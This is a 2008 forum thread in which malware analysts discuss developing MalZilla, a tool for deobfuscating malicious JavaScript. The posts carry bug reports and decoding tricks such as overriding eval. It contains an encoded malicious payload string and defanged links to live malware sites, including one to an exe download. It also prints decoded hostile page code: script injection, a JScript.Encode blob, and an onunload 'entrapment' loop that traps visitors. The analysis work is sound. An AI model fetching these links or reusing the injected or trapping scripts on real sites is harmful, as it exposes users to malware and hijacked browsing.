7b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">

</body>
</html>

And now is where the drudgework of tracing each variable as it's thrown around comes in...  I think I'll save it for the morning or tomorrow. 

A few things I would like to point about prerequisites for the string passed to the javascript function:
- It needs to be a longer string.  "hellohellohellohello" works, when "hello" returns nothing.  ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines being passed to it.
- The line "variable10 = variable10 + 256;" is bringing characters being made up above 256, no matter what.  AKA it's up to unicode
http://unicode.org/charts/
Title: Re: MalZilla
Post by: jimmyleo on February 18, 2008, 08:34:49 am
hello bobby

I've came across these issue many times recently.
I and my friend dikex found a way to decode it in script way we used to do.

because it call itself, so we throw it into a variable without changing. eg. var a="....";
and replace "arguments.callee" with the variable.
and we can do what we want to do. eg. replace eval() to ... method.

have fun!

best regards,
jimmyleo
Title: Re: MalZilla
Post by: bobby on February 18, 2008, 04:17:57 pm
Hi Drusepth, hi jimmyleo,

You can't make any single change in the script because it does not check only the length of the function, but it check every single character:
Code: [Select]
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
So, if Xn47RT3Sm does not have expected value at the end of the loop, it means something is changed in the script, and the decoding will not succeed. Just with proper value of this variable the data will decode like it should.

So, I have asked on other board for advice, and I was told to use the oldest trick in decoding - override eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
Code: [Select]
function eval(a) {document.write(a)};
This is re-definition of eval() function, so the eval will in the fact call document.write.

This is the only working method for this kind of scripts.

If you use this on other script, just be sure that the script does not do another overriding of eval() (or of any other internal function), after your overriding.

best regards
bobby
Title: Re: MalZilla
Post by: jimmyleo on February 19, 2008, 07:42:54 am
because it does not check only the length of the function, but it check every single character:

oh ,bobby:
You may not looked my reply carefully. :P
Quote
so we throw it into a variable without changing
Title: Re: MalZilla
Post by: bobby on February 19, 2008, 07:11:12 pm
@jimmyleo

Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example where you can show what are you exactly doing with arguments.callee?
Title: Re: MalZilla
Post by: jimmyleo on February 20, 2008, 02:24:15 am
it may helps you.

you can do it one step by one until the result reveal.

regards,
jimmyleo
Title: Re: MalZilla
Post by: tjs on February 25, 2008, 12:01:39 pm
I have a bug and feature suggestion related to the 'send to decoder' feature:

* send script to decoder breaks when a script src is closed.. ex:
   <script src="poked.js" language="JavaScript"></script>
   malzilla thinks the script starts after </script> till EOF

* send script to decoder can be improved on pages with multiple <script>
   <script>foo;</script><script>bar;</script>
   it would be nice to have a feature to send ALL scripts to decoder

Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com

Thanks,
TJS

Title: Re: MalZilla
Post by: bobby on February 25, 2008, 04:23:13 pm
@TJS
Many thanks for locating this bug.
I did saw it a couple of times, but I didn't located whats producing the bug.

About the sending all the scripts (or should I better say - all the relevant data) - it is not so trivial.
There is a lot of scripts which are using multiple begin and end tags (like in your example), but I also saw a lot of scripts where a part of malicious code is in HTML part:

<html>
<script>function decode_and_run(a){....}</script>
<body
 onLoad="decode_and_run('AF123400AA (encrypted data/code) ...')"></body></html>

See, I would need to build some heuristics that can decide if some of the normal HTML events are also relevant, and I do not know how to do that (in the fact, I have an idea, but I do not think that I'll ever have enough time to code it, just like I do not have time for my other ideas like using Malzilla as a scanner that would have signatures of various exploits, or adding more standard DOM objects and functions etc.)

If it would be OK just to have some kind of "Append to Decoder" button (as addition to Send to Decoder), that will be done in 5 minutes.

@jimmyleo
Unfortunately, I didn't succeed to get any results from the files you uploaded.
Do you use IE to run these or are you using any SpiderMonkey-based app (FireFox, Malzilla...)?
Title: Re: MalZilla
Post by: bobby on February 25, 2008, 04:57:42 pm
Finding script start and end points fixed for the given case.

What to do with multiple script tags, Append or Send All?
Title: Re: MalZilla
Post by: tjs on February 25, 2008, 06:20:45 pm
Append could get messy if you start doing cross-domain stuff (i dont want to manually have to clear decoder every time i work on a different site), so maybe a new button to send all to decoder is a good idea. But append is also a good idea because i'm sure there will be cases where your users dont want to send *all* scripts on a page to the decoder....

 ???

Has anyone else run into this issue? Does anyone have an opinion here?
Title: Re: MalZilla
Post by: bobby on February 25, 2008, 06:45:35 pm
You won't need to clear decoder anymore in the recent future.
Development version on my PC has tabbed interface (multiple tabs for Download and Decoder)
I will upload it as soon as we get (re)solved the emerging bugs/suggestions.
Title: Re: MalZilla
Post by: jimmyleo on February 26, 2008, 12:55:30 am
Re bobby:
I'm truly sorry for my not explanation.
I used IE to excute this script.
and you can see a following casser decoding.
and you can do the same issue to it.

regards,
jimi.
Title: Re: MalZilla
Post by: tjs on February 26, 2008, 05:48:42 am
I'm very excited about the tabs feature. :)
Title: Re: MalZilla
Post by: sowhat-x on February 26, 2008, 04:49:25 pm
Quote
...just like I do not have time for my other ideas,
like using Malzilla as a scanner that would have signatures of various exploits,
or adding more standard DOM objects and functions etc...

...just thought that this mailing-list thread might be of some interest to you...'Obfuscated web pages':
http://seclists.org/focus-ids/2008/Feb/0016.html
Title: Re: MalZilla
Post by: tjs on February 27, 2008, 10:50:28 pm
Another weird bug for you... still testing with 0.921

The malware script on the URL below breaks malzilla:
hxxp://updatez.info/etc/count.php?o=22

It throws the following error and does not properly decode the script:

Malzilla
-------
Some violation occured
in SpiderMonkey engine
      [  OK  ]

The page is attached in case the URL gets taken down.

TJS
Title: Re: MalZilla
Post by: bobby on February 28, 2008, 05:01:54 am
Hi TJS,

There is a trap (or bug) if you change or override eval() function.
The script will stuck in a loop until it gets all the memory/buffers full.

I'll take a closer look at it this evening, after I get back from the job.
I can't decode it neither as it uses document.createElement, and Malzilla does not have this DOM implemented.

Until then, use the following link to grab the exe file (got it from the debugger):
hxxp://updatez.info/etc/getexe.exe?o=1&t=1204173798&i=1416818079&e=1



Hi sowhat-x,

I'll take a look this evening. Thanks.

regards
bobby
Title: Re: MalZilla
Post by: bobby on February 28, 2008, 09:30:32 pm
Uploaded new snapshot:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804

Please test and report suggestions/bugs

regards
bobby
Title: Re: MalZilla
Post by: MysteryFCM on February 28, 2008, 10:13:01 pm
Nice one :)
Title: Re: MalZilla
Post by: tjs on February 28, 2008, 11:59:57 pm
Hi Bobby...

Thanks for the new beta... looks like another solid release. I'm very excited about the tabs feature and it's great to see it coming to a reality!

I've found a bunch of bugs in 0.922 and have some suggestions. They are included below.

Thanks again, and keep up the great work!

-TJS


-----
BUGS
-----

default nab name numbering reuse
- Create new tab [New Tab (2)]
- Close first tab [New Tab (1)]
- Create new tab [expected: New Tab (3), actual: New Tab (2)]

'Decode' - 'Selection length' doesn't display selection length when selection occurs due to a 'Find' operation.

Tools: Numbered list Maker is buggy. It puts a random number of \n before the output. Also, if input contains a blank line then the number of \n in output is much larger... sometimes the output is blank. Never noticed this behavior before.

Inconsistent capitalization in tabs (examples - Numbered list Maker vs. Templated list maker, should M be caps or not?) [I know it's a silly bug]

Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]

Putting & in a URL causes the char to get underlined in tab name (ex. h&ttp://blah.com causes t to get underlined [this is a Windows issue but you can escape it i think])

--------------
SUGGESTIONS
--------------
* CTRL-W to close tab
* Send to decoder to bring decoder window into focus (don't do this for append though)
* make tabs include the top tabs so that you dont need to worry about keeping decode tabs in syc with download tabs
* add a concatenate feature to misc decoders (too many times i see URLs that are split up with "ht"+"tp"+":/".. etc
* download/debugger load from file (sometimes i want to just view a file locally without putting it on a webserver)
* download all (with referrer/proxy/cookie/user agent) on numbered list maker (i think everyone uses this for malware with names like 1.exe or loader1.exe) ;)
* option to disable URL history (i hate autocomplete.. it's good in real browsers, not so much here) :)
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 05:07:48 am
Hi TJS,

- default tab name numbering reuse - I'll need to think how to generate the tab numbers
- Decode > Selection length - I can't reproduce. Selection length is in next line under Find function here
- I think I just fixed Numbered list maker
- Capitalization - fixed
- Settings tab - will take a look the Align parameter of components, as I can't reproduce
- & in name - I can just filter this character out of the name. It can't be escaped
- CTRL-W - I do not have defined any keyboard shortcuts, will do it in the future for whole app
- Send to Decoder to bring focus - just to make it optional. It was set once, and it is annoying in a lot of cases
- include top tabs - will test that
- concatenate - not so trivial if one variable is concatenated in more than one line
- load from file - option exists, please take a look at right click menu
- Download all is present on Clipboard Monitor page. I'll need to re-think about inclusion of Clipboard Monitor in future versions, as it mess Clipboard.
- URL history - will be optional in future

Which screen resolution you use?

regards
bobby
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 06:36:22 pm
Quote
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]

Sorry, didn't saw that you already mentioned the screen resolution. I saw what you mean.
I'll re-design Settings tab.
Title: Re: MalZilla
Post by: tjs on February 29, 2008, 07:34:47 pm
Another suggestion:

Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.

It would also be nice to have a 'Get to new tab' button in the download section.

Selection length repro:
* Get http://www.malwaredomainlist.com/ then copy/paste page source into decoder
* Search 'Malware', click 'Find'
* 'Malware' is selected, but selection length is 0

Download all in clipboard monitor page makes sense.. I'd still like to avoid having to use the clipboard monitor feature but that's easy enough to work around.

Thanks,
TJS

Title: Re: MalZilla
Post by: bobby on February 29, 2008, 07:53:08 pm
Hi TJS,

I'll make a checkbox for 'Use Referrer', null problemo.

Where you want exactly to have 'Get to new tab'? On Download tab? It does not make sense to me.
Or you mean on download section of Clipboard Monitor?

A question: at creating new tab in Download, should I take some parameters from current tab (User Agent etc.)?

Selection length problem:
It is calculated just if you select something by using mouse. It is triggered on onMouseUp event. Should I change this to work on Find too?

I have added right-click menu to Clipboard Monitor list, so you can paste links by hand. There is no need to keep the Clipboard Monitor running.
btw. Clipboard Monitor does not clear the clipboard anymore. This can lead to other issues, but we will see if this is better than clearing the clipboard.

I've also added right-click menu to Debugger's Variable State list, so one can Copy the data from there if the script does not compile.
Title: Re: MalZilla
Post by: sowhat-x on February 29, 2008, 08:16:27 pm
bobby,saw this over at SourceForge,
and it reminded me somehow what was discussed earlier,
regarding the usability of the 'Hex" view...it's Delphi:
http://sourceforge.net/projects/httpbot

What are your thoughts on this...having Malzilla able to also work in proxy-mode at some moment?
This way someone could also interact directly with the sites in question via his/her browser if needed:
ie.actually have it exploited and also keep records of all actions that took place in the http session...
Not a request,as it is quite a bit of work obviously,just random thoughts regarding future ideas...
Title: Re: MalZilla
Post by: bobby on February 29, 2008, 08:34:55 pm
@sowhat-x

Well, I must admit that I can't manage to add more functionality to Malzilla :(
The existing code needs to be updated all the time because of new scripts which are using new obfuscation techniques, and I can barely manage to get some free time to do that (hope to find some normal job in a couple of months, with normal working times).
Next thing to do is to extend the PScript's functionality, and to work on concatenating variables (TJS' request).
Also, if I can get some help from JavaScript Bridge people (wrapper I use for SpiderMonkey, http://delphi.mozdev.org/ ), I would like to make step-by-step debugger.
Unfortunately, till now I didn't received any useful help from them, and the debuger from the wrapper does not work if I set step-by-step option (Access violation).
Other things that also need attention are the complicated DOM things like document.createElement.
It is used a lot recently, and I still didn't get behind getting access violations when I try to manage it.

You will probably also want to take a look at Fiddler if you want to run malware on lamb-box:
http://www.fiddlertool.com/fiddler/
Title: Re: MalZilla
Post by: JohnC on February 29, 2008, 08:43:38 pm
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
Title: Re: MalZilla
Post by: sowhat-x on February 29, 2008, 09:17:23 pm
I agree 100% with what JohnC said...
wish I could actually give a bit of practical help;to be honest,
that's also the main reason I posted the few links to javascript-related blogs couple days ago,
just in case they provide you with a couple of new tricks/ideas or so...

Since it's still a 'one man's show'...patience,and everything will work out eventually...  ;)
It's not possible to catch up with everything at once,daily life obligations and the rest:
as a guess in the wild,situation must also be quite 'tricky' at the moment there,
with the latest stuff taking place in the Balkan area...
let's just hope things don't get any worse/more complicated than what they currently are...  :-\

And hey,I really mean it when I say 'not request,just random ideas',lol...
I have quite a few of http interceptors around here,perl/python stuff,
some of them I had also converted to standalone exes for use under machines without interpreters...
I'll have to dig my archives and submit them over at some moment during this month...
Title: Re: MalZilla
Post by: tjs on February 29, 2008, 11:41:04 pm
Nice idea about the right click stuff...

About the find length issue-- it's your project, and up to you. I just wanted to report it out because I want to help out in any way that I can :)

I'm not sure about the parameters issue.. I think that if you need the same referrer, then maybe it should remain in the same tab (in other words, don't persist referrer to new tabs) but usually proxy and user agent won't change when an analyst is going through multiple sites...

I agree with sowhat-x that these suggestions are only suggestions.. I don't want to dictate anything here :)

About the 'get to new tab' idea.. Let's say i'm looking at some site in tab (1) and i want to follow a url in a new tab, instead of opening a new tab and then pasting the url, how about letting me paste the url in tab (1) and click open in new tab or something like that.... i dunno, it's just an idea. In ffox/ie7 you can do a control-click on a URL to open it in a new tab- that would be HOT. :)

TJS

Title: Re: MalZilla
Post by: MysteryFCM on March 01, 2008, 12:10:13 am
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.

I'd have offered help when he first started developing it but I don't know Delphi .... :( (hoping to find some time to learn both Delphi and Ruby within the next 12 months - don't have much of it free)
Title: Re: MalZilla
Post by: tjs on March 04, 2008, 02:13:05 am
This page is using decode64() in conjunction with unescape().. Am I doing something wrong or is the decode section in malzilla unable to iterate through decode64()?

Example (live malware):
Quote
hxxp://radt.info/?0a2V5d29yZD1Xd3crTWF0dXJlK1ZpcA==

TJS

Attached in case the URL 404s.
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 02:27:13 am
Decoded just* fine with Malzilla?

*typo correction

Code: [Select]
<html>
<head>
<title>Www Mature Vip</title>
<meta name="robots" CONTENT="noindex, nofollow, noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script language="javascript" src="/d.js"></script>
<script language="javascript">
var enter_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
var exit_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
</script>
<script language="jscript.encode" src="/pop31.js"></script>
</head>
<body onunload="entrapment(0)" bottommargin="0" leftmargin="0" marginheight="0" marginwidth="0" rightmargin="0" topmargin="0">
<script language="javascript">
var sts = "JTNDJTczJTYzJTcyJTY5JTcwJTc0JTIwJTc0JTc5JTcwJTY1JTNEJTIyJTc0JTY1JTc4JTc0JTJGJTZBJTYxJTc2JTYxJTczJTYzJTcyJTY5JTcwJTc0JTIyJTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTZBJTczJTJFJTcwJTY4JTcwJTIyJTNFJTNDJTJGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNFJTNDJTY5JTZEJTY3JTIwJTczJTcyJTYzJTNEJTIyJTY4JTc0JTc0JTcwJTNBJTJGJTJGJTcyJTYxJTY0JTc0JTJFJTY5JTZFJTY2JTZGJTJGJTcwJTY4JTcwJTczJTc0JTYxJTc0JTczJTJGJTcwJTY4JTcwJTJEJTczJTc0JTYxJTc0JTczJTJFJTcwJTY4JTcwJTIyJTIwJTYyJTZGJTcyJTY0JTY1JTcyJTNEJTIyJTMwJTIyJTIwJTYxJTZDJTc0JTNEJTIyJTIyJTNFJTNDJTJGJTZFJTZGJTczJTYzJTcyJTY5JTcwJTc0JTNF";
document.write(unescape(decode64(sts)));
</script>
<script src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></script>
<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=pornstars" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>
<script language="jscript.encode" src="/pop32.js"></script>
</body>
</html>

Code: [Select]
<script type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></script><noscript><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscript>
The decode64 function is held in a seperate JS file, so you'd need to copy it over first;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/d.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:26:02:26
*****************************************************************
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + //all caps
"abcdefghijklmnopqrstuvwxyz" + //all lowercase
"0123456789+/="; // all numbers plus +/=

//Heres the decode function
function decode64(inp)
{
var out = ""; //This is the output
var chr1, chr2, chr3 = ""; //These are the 3 decoded bytes
var enc1, enc2, enc3, enc4 = ""; //These are the 4 bytes to be decoded
var i = 0; //Position counter

// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;

if (base64test.exec(inp)) { //Do some error checking
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, ?+?, ?/?, and ?=?\n" +
"Expect errors in decoding.");
}
inp = inp.replace(/[^A-Za-z0-9\+\/\=]/g, "");

do { //Here.s the decode loop.

//Grab 4 bytes of encoded content.
enc1 = keyStr.indexOf(inp.charAt(i++));
enc2 = keyStr.indexOf(inp.charAt(i++));
enc3 = keyStr.indexOf(inp.charAt(i++));
enc4 = keyStr.indexOf(inp.charAt(i++));

//Heres the decode part. There.s really only one way to do it.
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;

//Start to output decoded content
out = out + String.fromCharCode(chr1);

if (enc3 != 64) {
out = out + String.fromCharCode(chr2);
}
if (enc4 != 64) {
out = out + String.fromCharCode(chr3);
}

//now clean out the variables used
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";

} while (i < inp.length); //finish off the loop

//Now return the decoded values.
return out;
}
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 02:30:05 am
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/pop32.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:28:10:28
*****************************************************************
#@~^cgMAAA==r6Pc6bY{!D^Z'rJbP9W^;s+xD hMkYcE@!K4NJQJn^DPrN{^W,hr[Dt'T~4+ro4O{!~1Vm/J3JkrN{B/SUJQE&f)+$J3Jsl+)*yO2,E_E*zOqFGfO~FEQr*&RTZZE_rTWs{OszbvE@*@!&W(LE_r+^O@*J#p~k6P`UO+M{!Ds"xEr#~NK^Es+UOchDrO`E@!K8NJQr+1YP1Vmd/bNxB1Vdr9)Ny{m94vRC++N FqmWROv8% *cW*Xflc!TTZB~mK[4Ck+{BtDYalzJNGh VGC9R:m^DK:+9rCR1Wsz2E8&ktGm0Al7+&^m4/&W^ldtJdS0sm/4Rmm4[-+M/rW '{SZ~!BTB,hk9O4'EFEP4+rL4YxB8vPmVrL 'Bhr9Ns+E@*r_E@!wmDJ3JmhP lh+{BCs^WhU^DbwYz^^+k/EP-ls;'v/mh+GWhCbxB~&@*JQJ@!2mDE3Jm:P lsn'E:G\b+v~7lV!n'EwWaf /S0Qj.VxE3+UY.{!DsQrBP&@*r_E@!aCMJQrlsPxm:xB$ECVbYzv,\l^;+{BtbL4B,z@*@!2l.CsP~xmh+{B8L1WVG.EP-l^;'v[060060E~z@*JQJ@!+hE3J4[PkDm{v2Wa&c/A0_iMVxJ3nxD+.m!DVQEEP5EmsbYz{B4ko4B,8o1WsWM'v:6006W0EPhb[Ot{B8B~tnrTtO'EqB,xCh'B2.K:vPmsboU{BskN9VvPmVsWS?^.bwYz^m//{vdls+GWhlrUEPOXan'El22^kmCObWUzXRktG13Sl\O6slktvPaV;Lbx/aCo'B4OOw=zJhAh hmm.WsnNbl ^K:zLGJonY6sm/4aVmX+MB,&@*r_E@!JW8%r_J^Y@*J#p5xUBAA==^#~@

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:29:49:29
*****************************************************************
var noentrap = 0;

function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><head><title>Www Mature Vip</title><style type="text/css"><!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --></style></head><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></scr' + 'ipt><scr' + 'ipt type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></scr' + 'ipt><noscr' + 'ipt><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscr' + 'ipt>' +
'<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=celebs" width="100%"  height="1500" scrolling="no" frameborder="0"></iframe>');
document.close();
}
Title: Re: MalZilla
Post by: bobby on March 04, 2008, 04:42:39 am
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;

Decoder for jscript.encode is on Misc Decoders tab (Decode JS.encode).
Title: Re: MalZilla
Post by: MysteryFCM on March 04, 2008, 04:01:15 pm
Ah right hehe ...... I'd forgotten about that  :-[
Title: Re: MalZilla
Post by: bobby on March 04, 2008, 08:13:56 pm
Ah right hehe ...... I'd forgotten about that  :-[

Not your guilt, I'm the one who does not have enough time to document all the functions.


@TJS
Just to let you know that "concatenate" function is implemented :)
Title: Re: MalZilla
Post by: tjs on March 04, 2008, 09:03:50 pm
woot! :)
Title: Re: MalZilla
Post by: bobby on March 07, 2008, 11:49:21 pm
0.9.3pre3 (0.9.2.3) uploaded to SourceForge one minute ago.
I do not know how much time will take until all the mirrors gets updated, but I hope in a couple of hours it should be available for download.
Title: Re: MalZilla
Post by: tjs on March 07, 2008, 11:51:40 pm
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?

Thanks for the new release!
TJS

Title: Re: MalZilla
Post by: bobby on March 07, 2008, 11:55:56 pm
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?

Thanks for the new release!
TJS



Format text is gone (with the wind).
It was useless...
It added a line-break after every semi-colon, and that does damage in a lot of cases.

I will search for a better tokenizer for formating text, but as for now I have none that is working like it should.
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 12:05:21 am
Another suggestion:

Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.

....

Thanks,
TJS


Isn't un-checking Auto-set referrer on Settings tab exactly that what you need?
Title: Re: MalZilla
Post by: tjs on March 08, 2008, 01:37:30 am
Two responses:

Format text is _NOT_ useless! I use it almost every single time i analyze a malware page. Please don't remove it otherwise I'll be hacking at your source and recompiling a private build for myself with it. I think even in it's limited form it is a great feature to improve readability of scripts.

Referrer settings on the download tab is better because, like using a useragent/cookies/proxy sometimes you want it and sometimes you dont. In most cases, I don't particularly because i usually analyze many sites at the same time which causes me to 'share' the last site I looked at with the current one via referrer. I'm cool with having it on the settings page, but in that case, why not move the proxy, user agent and cookies options there too?

TJS
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 01:38:58 am
I vote to restore the format code option too :)
Title: Re: MalZilla
Post by: sowhat-x on March 08, 2008, 04:38:07 am
(http://img364.imageshack.us/img364/9845/gonewiththewindpg4.png)

Rotflmao... ;D
Ok,seriously now...
If it's not much trouble,I also vote for it to be re-included...
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 08:29:36 am
Hi guys,

The code for that Format text was something like:

if you see a semi-colon, replace it with semi-colon + line break.

Translated to Pascal, that is exactly one line of code.
It is not a problem to bring it back, but that rule for inserting line breaks is simply wrong.
One should take care of tokens, and put a line break only if the semi-colon is the end of a token.

Biggest problem was that, if you click it 2-3 times, your text will end with a bunch of line breaks one after another.

I will really search for better solution. It should not be far away. I just need to study the code of the highlighter I'm using there - the highlighter does know where the end of tokens are.
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 08:33:09 am
hehe no worries :)

Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
Title: Re: MalZilla
Post by: bobby on March 08, 2008, 09:35:03 am
hehe no worries :)

Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
That code is full with references to DOM objects that Malzilla does not support.
After removing some of the references, I've managed to get it decoded.

btw.
Quote
This page is protected by unregistered version of Right HTML Protector
Title: Re: MalZilla
Post by: MysteryFCM on March 08, 2008, 09:39:32 am
Oh right, hehe
Title: Re: MalZilla
Post by: bobby on March 09, 2008, 12:47:27 am
Le Format Text Est Mort, Vive Le Format Code!

Who wants to play with new formating?
http://malzilla.sourceforge.net/test/

Pick the new exe (you already have the DLLs from previous downloads). There is new formating for Decode tab.
I'll test tomorrow how good is working with HTML code, to see how to deal with Download tab code formating.

Please test, and tell me if works well or bad for you.

Take into account that the formating can break some code from executing (code checking for function length).
Title: Re: MalZilla
Post by: MysteryFCM on March 09, 2008, 03:16:47 pm
Seems to work perfectly :) ......
Title: Re: MalZilla
Post by: bobby on March 09, 2008, 04:53:11 pm
New upload to http://malzilla.sourceforge.net/test/
(overwritten the previous upload)

Please test:
Ctrl + Send to Decoder
Ctrl + Send all to Decoder
Format code on Download tab
Title: Re: MalZilla
Post by: MysteryFCM on March 09, 2008, 05:01:40 pm
Works perfectly here :)
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 02:08:30 pm
Just to let you know that now we have a very own hacked version of SpiderMonkey that will let us decode these scripts where we used debugger to see the downloading link for EXE. See the bug report from TJS here: http://www.malwaredomainlist.com/forums/index.php?topic=218.msg2225#msg2225

The process is time-consuming (1-2 minutes for the script attached by TJS), but at the end you will have the source code of the exploit :)

Will upload a new version as soon as I implement this feature in the GUI.
I can't promise that I'll do this in the next few days, so if someone needs this feature urgently I can upload the hacked SpiderMonkey and the instructions on how to use manually this feature.

Happy hacking ;)
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 02:49:56 pm
Idea that came to mind while digging through stuff locally...

Both 'Cookies' and 'Links Parser' extraction are obviously already there....
what about a 'Forms' extraction tab maybe?  ::)
I've also have a couple of Delphi sources archived here,
meant exactly for this feature/capability... ;)
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 06:44:04 pm
Hi sowhat-x,

Any examples of files with Forms that would need to be extracted?
I'm not some HTML guru, so I would need a couple of examples to see what needs to be done.
If it is a tag, Malzilla already has a tag extraction engine, I just need to tell it to extract this one too.

Please, write your suggestions here.
Day after tomorrow I'll have some time in the evening to code, so if anyone have a suggestion - please write it before that.
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 08:05:40 pm
Standard code for forms is;

Code: [Select]
